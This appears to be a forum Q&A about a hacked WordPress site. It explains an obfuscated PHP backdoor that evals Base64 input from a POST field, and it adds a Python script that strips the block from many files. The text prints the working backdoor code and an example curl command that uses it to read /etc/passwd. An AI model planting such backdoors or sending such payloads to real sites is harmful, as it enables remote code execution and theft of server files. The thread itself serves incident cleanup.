Suspicious code found in my WordPress site – How to fix?

One of my sites was hacked last night and some pornographic content was placed on it.

What I have done:


I have manually removed the adult content from the site using FTP.

My website is up now and working fine. But I am still able to find some code in my plugin and theme files which was not written by me. The code is as below:

    <?php
    // 12-character "alphabet"; every name below is spelled by picking characters out of it
    $sF="PCT4BA6ODSE_";
    // indices 4,5,9,10,6,3,11,8,10,1,7,8,10 spell BASE64_DECODE; strtolower() gives base64_decode
    $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
    // indices 11,0,7,9,2 spell _POST; ${"_POST"} is the $_POST superglobal, so this is $_POST['n842e1c']
    $s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];
    if(isset($s22))
    {
        eval($s21($s22)); // i.e. eval(base64_decode($_POST['n842e1c']))
    }
    ?>

My queries are:

  • What does this code stand for, what is it doing?
  • Is this harmful?
  • Should I remove this code from my files?
  • Will removing it have any effect on my site?

Other Code Suggestions Required:

This sort of code is present in 100+ files. Is there any method to remove the code from all files at once? Or any method to keep the code and just disinfect it? That would save me the time of removing the code manually from so many files.

  1. What does this code stand for, what is it doing?

    This code is a backdoor which can be used by an attacker to execute arbitrary code. This is what the code intends to do:

    <?php
    eval( base64_decode( $_POST['n842e1c'] ) );
    

    An attacker can make a POST request to this file with his encoded payload in the POST parameter n842e1c and execute PHP code.

    Example:

    curl -X POST -d "n842e1c=ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs=" http://PATH_TO_THIS_FILE
    

    Here ZWNobyByZWFkZmlsZSgnL2V0Yy9wYXNzd2QnKTs= is the Base64-encoded form of echo readfile('/etc/passwd');.

    Is this harmful?

    Yes

    Should I remove this code from my files?

    Yes

    Will removing this have any effect on my site?

    No

    Here are some tips to help you clean the website. Also, follow this official post by WordPress to take the necessary steps.

    1. It's a backdoor: it takes a POST parameter named n842e1c and executes it. The instruction is Base64-encoded.
    2. It is.
    3. You should, immediately.
    4. Nothing; remove it ASAP.

    Maybe re-install WordPress, or you could quickly write a script in Python (or something else) to remove this string from your files.

  2. PHP eval is dangerous.

    It basically executes the code within its function. So you must remove it if you are not sure of its use in your website.

    The eval() language construct is very dangerous because it allows
    execution of arbitrary PHP code. Its use thus is discouraged. If you
    have carefully verified that there is no other option than to use this
    construct, pay special attention not to pass any user provided data
    into it without properly validating it beforehand.
    Source: PHP manual, eval()

    You cannot disable it directly, so the only choice is to remove the code from all the files.
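For the bulk-removal part of the question (the same block in 100+ files), here is an added example in Python; it is not code from any of the answers. It walks a directory tree, strips the posted block wherever it occurs and, before writing anything back, keeps a copy of each modified file in a backup directory that is assumed to be outside the web root. The regular expression requires the complete structure of the posted block (its own <?php ... ?> wrapper, the alphabet string, the two index-built names, the isset() guard and the eval() call) and lets only the variable names and the POST parameter name vary, so it will not touch unrelated code; equally, it will not catch a differently built backdoor, so reinstalling core, plugins and theme from clean sources is still the right follow-up. The sample files are constructed for the demonstration.

```python
"""Strip the posted eval()/base64_decode() backdoor from every .php file under a directory."""
import argparse
import os
import re
import shutil
import tempfile

# Whitespace or // line comments are allowed between the statements of the block.
SEP = rb"(?:\s|//[^\n]*)*"

# One regular expression for the whole injected block as posted. Variable names and
# the POST parameter name may differ between files; the structure must be complete.
BACKDOOR_RE = re.compile(
    rb"<\?php" + SEP
    + rb'\$\w+\s*=\s*"[^"]*";' + SEP                               # $sF="PCT4BA6ODSE_";
    + rb"\$\w+\s*=\s*strtolower\([^;]*\);" + SEP                   # $s21=strtolower($sF[4]. ...);
    + rb"\$\w+\s*=\s*\$\{strtoupper\([^}]*\)\}\['[^']*'\];" + SEP  # $s22=${strtoupper(...)}['n842e1c'];
    + rb"if\s*\(\s*isset\(\$\w+\)\s*\)\s*\{" + SEP                 # if(isset($s22)) {
    + rb"eval\(\$\w+\(\$\w+\)\);" + SEP                            # eval($s21($s22));
    + rb"\}\s*\?>[ \t]*\r?\n?"                                     # } ?>
)

# Constructed sample: the block from the question prepended to a minimal plugin file.
SAMPLE_INFECTED = (
    b'<?php \n        $sF="PCT4BA6ODSE_";\n'
    b"$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);"
    b"$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n842e1c'];\n"
    b"if(isset($s22))\n{\neval($s21($s22));\n}\n    ?>\n"
    b"<?php\n/* Plugin Name: Example */\nfunction example_init() {}\n"
)
SAMPLE_CLEAN = b"<?php\n/* Plugin Name: Example */\nfunction example_init() {}\n"


def strip_backdoor(source):
    """Return (cleaned_bytes, blocks_removed) for the contents of one file."""
    return BACKDOOR_RE.subn(b"", source)


def clean_tree(root, backup_dir, apply=False):
    """Scan every .php file under root; return {relative_path: blocks_removed}.

    apply=False reports only. apply=True first copies each infected file, with its
    relative path preserved, into backup_dir (assumed to be outside the web root so
    the copy can never be served), then writes the cleaned bytes back in place.
    """
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                cleaned, removed = strip_backdoor(fh.read())
            if not removed:
                continue
            rel = os.path.relpath(path, root)
            found[rel.replace(os.sep, "/")] = removed
            if apply:
                backup_path = os.path.join(backup_dir, rel)
                os.makedirs(os.path.dirname(backup_path), exist_ok=True)
                shutil.copy2(path, backup_path)
                with open(path, "wb") as fh:
                    fh.write(cleaned)
    return found


def demo():
    """Build a scratch tree with one infected and one clean file, clean it, and report."""
    with tempfile.TemporaryDirectory() as scratch:
        root = os.path.join(scratch, "wp-content")
        os.makedirs(os.path.join(root, "plugins", "example"))
        infected = os.path.join(root, "plugins", "example", "example.php")
        with open(infected, "wb") as fh:
            fh.write(SAMPLE_INFECTED)
        with open(os.path.join(root, "plugins", "index.php"), "wb") as fh:
            fh.write(SAMPLE_CLEAN)
        report = clean_tree(root, os.path.join(scratch, "backup"), apply=True)
        with open(infected, "rb") as fh:
            after = fh.read()
        with open(os.path.join(scratch, "backup", "plugins", "example", "example.php"), "rb") as fh:
            backup = fh.read()
    return report, after, backup


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("root", help="tree to scan, e.g. /var/www/html/wp-content")
    parser.add_argument("--backup-dir", required=True, help="copies of infected files; keep it outside the web root")
    parser.add_argument("--apply", action="store_true", help="write changes (default: report only)")
    args = parser.parse_args()
    for rel, count in sorted(clean_tree(args.root, args.backup_dir, args.apply).items()):
        print(f"{rel}: {count} block(s) {'removed' if args.apply else 'found'}")
```

Run it once without --apply: the list it prints is also the list of files the attacker wrote to, which is worth keeping for the incident record. Then run it again with --apply, and afterwards diff the cleaned plugin and theme directories against fresh copies from wordpress.org to confirm nothing else was left behind.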